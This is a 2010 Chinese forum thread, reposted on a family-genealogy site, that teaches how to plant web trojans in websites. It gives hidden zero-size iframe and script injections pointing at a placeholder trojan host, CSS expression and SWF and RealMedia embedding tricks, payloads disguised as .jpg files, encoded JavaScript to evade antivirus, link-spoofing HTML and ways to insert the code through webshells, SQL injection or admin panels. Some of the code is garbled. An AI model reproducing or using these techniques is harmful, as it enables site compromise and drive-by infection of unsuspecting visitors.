切换到宽版
统计排行
基本信息
到访IP统计
管理统计
在线会员
会员排行
版块排行
帖子排行
标签排行
帮助中心
每日签到
中华游氏网的微博
银行
邀请注册
道具中心
下拉
用户名
UID
电子邮箱
用户名
密 码
记住登录
登录
找回密码
注册
QQ帐号登录
内容互通,快速登录
快捷通道
关闭
您还没有登录,快捷通道只有在登录后才能使用。
立即登录
还没有帐号? 赶紧
注册一个
论坛社区
字辈库
游氏古籍档案网
群组广场
博客空间
网站基金
功 德 榜
游氏网站史
游氏网公众号
帖子
文章
日志
用户
版块
群组
帖子
搜索
热搜:
应德
应天府
法万公
长乐
石城
新市
游氏网
>
建筑工程
>
讲述各种挂马的技巧
发帖
回复
返回列表
新帖
2278
阅读
3
回复
讲述各种挂马的技巧
[复制链接]
上一主题
下一主题
离线
游春波
UID:348
注册时间
2008-03-02
最后登录
2024-07-18
在线时间
1515小时
发帖
6734
搜Ta的帖子
精华
9
金钱
54611
贡献值
193
交易币
209
好评度
1569
访问TA的空间
加好友
用道具
前任管理
关闭
个人中心可以申请新版勋章哦
立即申请
知道了
发帖
6734
金钱
54611
贡献值
193
交易币
209
好评度
1569
家乡
广东省河源市
性别
男
加关注
发消息
只看楼主
倒序阅读
使用道具
楼主
发表于: 2010-05-21
(1) HTML挂马法。
b: I0Zv6
常规的HTML挂马方法一般是在网页中插入一条iframe语句,像<iframe src=http://www.xxx.com/horse.html width=0 height=0></iframe>。查看站点是否被挂,一般是查找一下关键词iframe。
b: I0Zv6
(2) 再隐藏一点的就是js挂马了。
b: I0Zv6
像再原来的网页中写入<script str=http://www.xxx.com/horse.js></script> ,horse里的js写法一般为 document.write(‘http:\/\/www.xxx.com\/horse.html'>;,或者专业一点的写法是 top.document.body.innerHTML = top.document.body.innerHTML + ' <inframe src=http://www.xxx.com/horse.htm/“></iframe>'’;。不过第2种写法要注意:是原来的网页种要有body标签。
b: I0Zv6
3) 在 css中挂马。
b: I0Zv6
这个方法就是在css中写入
b: I0Zv6
body {
b: I0Zv6
hytop:expression(top.document.body.innerHTML = top.document.body.innerHTML + ' <iframe src=http://www.xxx.com/horse.html/”></iframe>‘);
b: I0Zv6
}
b: I0Zv6
然后在主页中调用这个CSS,代码类似
http://www.cnhacker.org/css.css
“ rel=”stylesheet“ type=”text/css“>这样的。在csdn 中对expression的解释是:IE5及其以后版本支持在CSS中使用expression,用来吧CSS属性和Javascript表达式关联起来,这里的CSS属性可以是元素固有的属性,也可以是自定义属性。也就是说CSS属性后面可以是一段Javasccript表达式,CSS属性的值等于 Javascript表达式计算的结果。在表达式中可以是直接一用元素自身的属性和方法,也可以使用其它浏览器对象。这个表达式就好像是在这个元素的一个成员函数中一样。整个解释关键点是expression可以在css中引入js语句,所以我们可用于挂马。不过写的语句值可以远程调用,本地不可以。
b: I0Zv6
(4) 在swf中挂马
b: I0Zv6
共
条评分
评价一下你浏览此帖子的感受
精彩
感动
搞笑
开心
愤怒
无聊
灌水
有志者事竟成
回复
▲
返回顶部
▲
举报
分享到
淘江湖
新浪
QQ微博
QQ空间
开心
人人
豆瓣
网易微博
百度
鲜果
白社会
飞信
离线
游春波
UID:348
注册时间
2008-03-02
最后登录
2024-07-18
在线时间
1515小时
发帖
6734
搜Ta的帖子
精华
9
金钱
54611
贡献值
193
交易币
209
好评度
1569
访问TA的空间
加好友
用道具
前任管理
发帖
6734
金钱
54611
贡献值
193
交易币
209
好评度
1569
家乡
广东省河源市
性别
男
加关注
发消息
只看该作者
沙发
发表于: 2010-05-21
网上有一些swf挂马的工具,可以用工具替换原来网页中的swf或单独把swf发给对方,一可以单独作一个可显示swf页的网页。在网页中插入swf的语法一般格式为:
b: I0Zv6
<OBJECT classid=clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 codebase=http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5.0.0.0 WIDTH=760 NAME=quality VALUE=high> <EMBED src=http://www.7747.net/xxx.swf” quality=high pluginspage=http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash type=application/x-shockwave-flash width=760 height=60></EMBED></OBJECT>
b: I0Zv6
BLE>
b: I0Zv6
(5) 在影音文件中挂马。
b: I0Zv6
所需工具是RealMedia Editor,打开工具后,然后依次选择“文件”-“打开Real媒体文件”,然后选择需要编辑的视频文件,其格式必须是RealOne公司的以RM或 RMVB为扩展名的文件。接着,新建一个文本,在里面输入u 00:00:10:0 00:00:30.0&&_rpexternal&
http://www.xxx.com/horse.htm
;(00:00:10.0就是发生第一事件的时间,这里是让计算机弹出网页;00:00:30.0同样,这是第二次发生的时间,在0时0分第30秒0微妙时弹出窗口;而后面的URL地址就是连接指定的木马地址。)
b: I0Zv6
输入完毕后并保存,然后依次选择“工具”-“合并事件”,导入刚才的文本。当合并完成后,依次选择“文本”-“Real文件另存为”,保存好即可。
b: I0Zv6
最后把生成的视频文件发布网上,当对方观看同时就会连接到你指定的木马地址。
b: I0Zv6
2,挂马的技巧
b: I0Zv6
挂马首先要求的是隐蔽性,这样挂的时间才能长。像在SWF、JS、RM中挂马就是比较隐蔽了,但是还可再用到些技巧。
b: I0Zv6
(1)远程任意后缀执行HTML
b: I0Zv6
可以把horse.html改成horse.jpg之类的后缀,然后语句写成<iframesrc=/uploadfile/200902/20090220105353594.jpg width=0 height=0></iframe>。js也可以,语句为<script src=/uploadfile/200902/20090220105353594.jpg></script>,甚至js的不要后缀名都可以。
b: I0Zv6
2)JS的加密
b: I0Zv6
共
条评分
有志者事竟成
回复
▲
返回顶部
▲
举报
离线
游春波
UID:348
注册时间
2008-03-02
最后登录
2024-07-18
在线时间
1515小时
发帖
6734
搜Ta的帖子
精华
9
金钱
54611
贡献值
193
交易币
209
好评度
1569
访问TA的空间
加好友
用道具
前任管理
发帖
6734
金钱
54611
贡献值
193
交易币
209
好评度
1569
家乡
广东省河源市
性别
男
加关注
发消息
只看该作者
板凳
发表于: 2010-05-21
为了保护网页木马的代码,可以把JS内容加密,还能躲开杀软的作用。如果使用ENCODE加密方式,加密后的JS调用语句就用<scriptlanguage=“jscript”。encode“src=http://www.xxx.com/horse.txt& gt;</script>。除此方法外,还有其它更多的方法!
b: I0Zv6
(3)URL的变形
b: I0Zv6
URL的变形方法也有很多,例如将url的16进制转换为encod编码等。如果是涉及到URL欺骗的方法就更多了,不过多数的URL欺骗,像利用@的技巧,IE都已经打补丁了。但现在有个漏洞仍然有效,代码如下:
b: I0Zv6
<a id=”CZY“ href=http://www.baidu.com”></a>
b: I0Zv6
<div>
b: I0Zv6
<a href=http://www.google.cn“ target=”_blank“>
b: I0Zv6
<table>
b: I0Zv6
<caption>
b: I0Zv6
<a href=http://www.google.cn” target=“_blank”>
b: I0Zv6
<label for=“CZY”>
b: I0Zv6
<u style=“cursor: pointer: color: blue”>
b: I0Zv6
Google</u>
b: I0Zv6
</label></a></caption></table></a></div>
b: I0Zv6
保存该代码为网页后,鼠标移动到Google这个链接上时,IE状态栏显示的
http://www.google.cn
,但点击链接后却打开http: //www.baidu.com网站。如果你的网马可以用IP地址访问到的话,IP地址也可以进行转换的。像127.0.0.1这样的IP还可以变为 2130706433、0×7f.0×00.0×00.0×01、0177.0000.0000.0001等等,这只不过是8进制、10进制、16进制、的转换而已。
b: I0Zv6
3,如何才能挂到马
b: I0Zv6
拿到了webshell的话,挂马自然是很简单了。但是拿不到的情况下,如果注入点有update权限,我们可以仔细查找首页中的某条新闻的调用链接,然后update数据库达到我们的目的。如果可进入后台,我没就可以在一些发公告的地方写入自己的木马代码(不过千万别打乱前台html源文件里的代码逻辑)。
b: I0Zv6
b: I0Zv6
b: I0Zv6
共
条评分
有志者事竟成
回复
▲
返回顶部
▲
举报
离线
游功星
UID:3280
注册时间
2010-04-03
最后登录
2022-04-08
在线时间
274小时
发帖
652
搜Ta的帖子
精华
0
金钱
32563
贡献值
665
交易币
0
好评度
310
访问TA的空间
加好友
用道具
版主
发帖
652
金钱
32563
贡献值
665
交易币
0
好评度
310
家乡
湖北省黄石市
性别
男
加关注
发消息
只看该作者
地板
发表于: 2010-05-21
呵呵,太专业,搞不懂!
共
条评分
回复
▲
返回顶部
▲
举报
发帖
回复
返回列表
http://www.chineseyou.com
访问内容超出本站范围,不能确定是否安全
继续访问
取消访问
快速回复
限100 字节
您目前还是游客,请
登录
或
注册
进入高级模式
文字颜色
发 布
回复后跳转到最后一页
上一个
下一个
隐藏
快速跳转
特别关注
新人报到
家园公告
游氏动态
寻亲问祖
游氏研究区
游氏源流
游氏族谱
游氏字辈
游氏宗祠
游氏人文
立雪书院
游氏仙姑
游酢文化研究
岁月游家
游氏休闲广场
艺术之窗
摄影天下
情感小屋
文化长廊
悠哉游哉
国事天下事
百事通
易经玄学
建筑工程
生活广场
电脑诊所
宗亲创业
商务交易
网站事务
站务处理
教程辅导
关闭
关闭
选中
1
篇
全选